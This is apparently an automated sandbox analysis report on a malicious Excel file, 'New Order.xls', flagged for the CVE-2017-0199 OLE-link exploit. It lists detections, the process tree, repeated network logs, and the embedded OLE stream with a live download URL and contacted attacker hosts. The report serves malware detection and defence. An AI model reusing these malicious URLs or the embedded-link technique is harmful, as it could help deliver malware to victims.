Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New Order.xls

Overview

General Information

Sample name:New Order.xls
Analysis ID:1632079
MD5:c7872daffc3e3ebb82767d76b666b84a
SHA1:216df5633d5e9cbbf7adc26d5207fd801857b3f3
SHA256:63a1fe8ac5a716954156b21911bfeecb3438933c6a981f8828173adc2bf7ca89
Tags:CVE-2017-0199xlsuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected landing page (webpage, office document or email)
Excel sheet contains many unusual embedded objects
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w11x64_office
  • EXCEL.EXE (PID: 2392 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • splwow64.exe (PID: 4248 cmdline: C:\Windows\splwow64.exe 12288 MD5: 4C1F48431A4C5DE7841216C32CD98C46)
  • EXCEL.EXE (PID: 2756 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\New Order.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Excel Network Connections
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 104.26.1.139, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2392, Protocol: tcp, SourceIp: 192.168.2.27, SourceIsIpv6: false, SourcePort: 49384
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.27, DestinationIsIpv6: false, DestinationPort: 49384, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 2392, Protocol: tcp, SourceIp: 104.26.1.139, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: New Order.xlsAvira: detected
Multi AV Scanner detection for submitted file
Source: New Order.xlsVirustotal: Detection: 40%Perma Link
Source: New Order.xlsReversingLabs: Detection: 31%

Phishing

barindex
AI detected landing page (webpage, office document or email)
Source: Screenshot id: 10Joe Sandbox AI: Screenshot id: 10 contains QR code
Source: Screenshot id: 9Joe Sandbox AI: Screenshot id: 9 contains QR code
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.27:49388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.27:49387 version: TLS 1.2
Source: global trafficDNS query: name: link.orai.io
Source: global trafficDNS query: name: st3.pro
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49372 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.27:49372
Source: global trafficTCP traffic: 192.168.2.27:49372 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.27:49372
Source: global trafficTCP traffic: 192.168.2.27:49372 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.27:49372
Source: global trafficTCP traffic: 192.168.2.27:49372 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 104.26.1.139:443 -> 192.168.2.27:49384
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 104.26.1.139:443 -> 192.168.2.27:49384
Source: global trafficTCP traffic: 104.26.1.139:443 -> 192.168.2.27:49384
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 104.26.1.139:443 -> 192.168.2.27:49384
Source: global trafficTCP traffic: 104.26.1.139:443 -> 192.168.2.27:49384
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 104.26.1.139:443 -> 192.168.2.27:49384
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 104.26.1.139:443 -> 192.168.2.27:49384
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 104.26.1.139:443 -> 192.168.2.27:49384
Source: global trafficTCP traffic: 104.26.1.139:443 -> 192.168.2.27:49384
Source: global trafficTCP traffic: 104.26.1.139:443 -> 192.168.2.27:49384
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 192.168.2.27:49384 -> 104.26.1.139:443
Source: global trafficTCP traffic: 104.26.1.139:443 -> 192.168.2.27:49384
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49385
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49385
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49385
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49385
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49385
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49385
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49385
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49385
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49385
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49385
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49385 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49385
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49386
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49386
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49386
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49386
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49386
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49386
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49386
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49386
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.27:49386
Source: global trafficTCP traffic: 192.168.2.27:49386 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49387
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49388
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49387
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49388
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49388
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49387
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49387
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49387
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49388
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49388
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49387
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49388
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49388
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49388
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49388
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49388 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49388
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49387
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49387
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49387
Source: global trafficTCP traffic: 192.168.2.27:49387 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.27:49387
Source: global trafficTCP traffic: 192.168.2.27:49372 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 104.26.1.139 104.26.1.139
Source: Joe Sandbox ViewIP Address: 5.161.200.29 5.161.200.29
Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /nBuIRQ?&mix=gaudy&role=yummy&will=flawless&technician HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: link.orai.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /NukfDlP HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: st3.pro
Source: global trafficHTTP traffic detected: GET /404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: st3.pro
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /nBuIRQ?&mix=gaudy&role=yummy&will=flawless&technician HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: link.orai.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /NukfDlP HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: st3.pro
Source: global trafficHTTP traffic detected: GET /404 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: st3.pro
Source: global trafficHTTP traffic detected: GET /rules/rule170146v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120201v19s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficDNS traffic detected: DNS query: link.orai.io
Source: global trafficDNS traffic detected: DNS query: st3.pro
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Date: Fri, 07 Mar 2025 18:26:37 GMTEtag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"Strict-Transport-Security: max-age=15552000; includeSubDomainsVary: Accept-EncodingX-Content-Type-Options: nosniffX-Dns-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Powered-By: Next.jsX-Xss-Protection: 1; mode=blockConnection: closeTransfer-Encoding: chunked
Source: New Order.xls, A0040000.0.drString found in binary or memory: https://link.orai.io/nBuIRQ?&mix=gaudy&role=yummy&will=flawless&technician
Source: Primary1741371936281475100_BC481253-AEBA-4B45-B8D1-BF1DB4DD15B5.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49388
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49387
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49386
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49385
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49384
Source: unknownNetwork traffic detected: HTTP traffic on port 49387 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49386 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49388 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49385 -> 443
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.27:49388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.27:49387 version: TLS 1.2

System Summary

barindex
Excel sheet contains many unusual embedded objects
Source: New Order.xlsOLE: Microsoft Excel 2007+
Source: ~DF88353551C6CABD09.TMP.0.drOLE: Microsoft Excel 2007+
Source: A0040000.0.drOLE: Microsoft Excel 2007+
Source: New Order.xlsOLE indicator, VBA macros: true
Source: New Order.xlsStream path 'MBD0022EEA8/\x1Ole' : https://link.orai.io/nBuIRQ?&mix=gaudy&role=yummy&will=flawless&technician8D}@DuP"=iq~U&k9#AtiK=b+6gjvy"w)!B"fvz!N[!~bS^SP&.Fq&*MT[SzRsO2I5enSGXysPcAHE7liJrLtGDvqy9oLo6KBsx8H8G6ivtT9y0kBfkwKXfUMeRG1rPdEcNGnqm4WEM02fus6mZZPBpIXwM9cnNDzYoF9pbr1tb7Jlw2ZkY5FsqKDkKF7bAmGgyyMmHpBDd4LpJiCPaPgFjNhgAF4X5OJW0F4WMrTxEz7YFah14HJGeQRoBl0oHaXROks4XDYgRuOvxvEpwGU0isD9QJ3x4EdES4yTRSHgynv-NU&:'A3hRl2ue?
Source: A0040000.0.drStream path 'MBD0022EEA8/\x1Ole' : https://link.orai.io/nBuIRQ?&mix=gaudy&role=yummy&will=flawless&technician8D}@DuP"=iq~U&k9#AtiK=b+6gjvy"w)!B"fvz!N[!~bS^SP&.Fq&*MT[SzRsO2I5enSGXysPcAHE7liJrLtGDvqy9oLo6KBsx8H8G6ivtT9y0kBfkwKXfUMeRG1rPdEcNGnqm4WEM02fus6mZZPBpIXwM9cnNDzYoF9pbr1tb7Jlw2ZkY5FsqKDkKF7bAmGgyyMmHpBDd4LpJiCPaPgFjNhgAF4X5OJW0F4WMrTxEz7YFah14HJGeQRoBl0oHaXROks4XDYgRuOvxvEpwGU0isD9QJ3x4EdES4yTRSHgynv-NU&:'A3hRl2ue?
Source: ~DF88353551C6CABD09.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal64.winXLS@4/14@3/3
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\A0040000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{BC481253-AEBA-4B45-B8D1-BF1DB4DD15B5} - OProcSessId.datJump to behavior
Source: New Order.xlsOLE indicator, Workbook stream: true
Source: A0040000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: New Order.xlsVirustotal: Detection: 40%
Source: New Order.xlsReversingLabs: Detection: 31%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\New Order.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: New Order.xlsStatic file information: File size 1231360 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: ~DF88353551C6CABD09.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: New Order.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
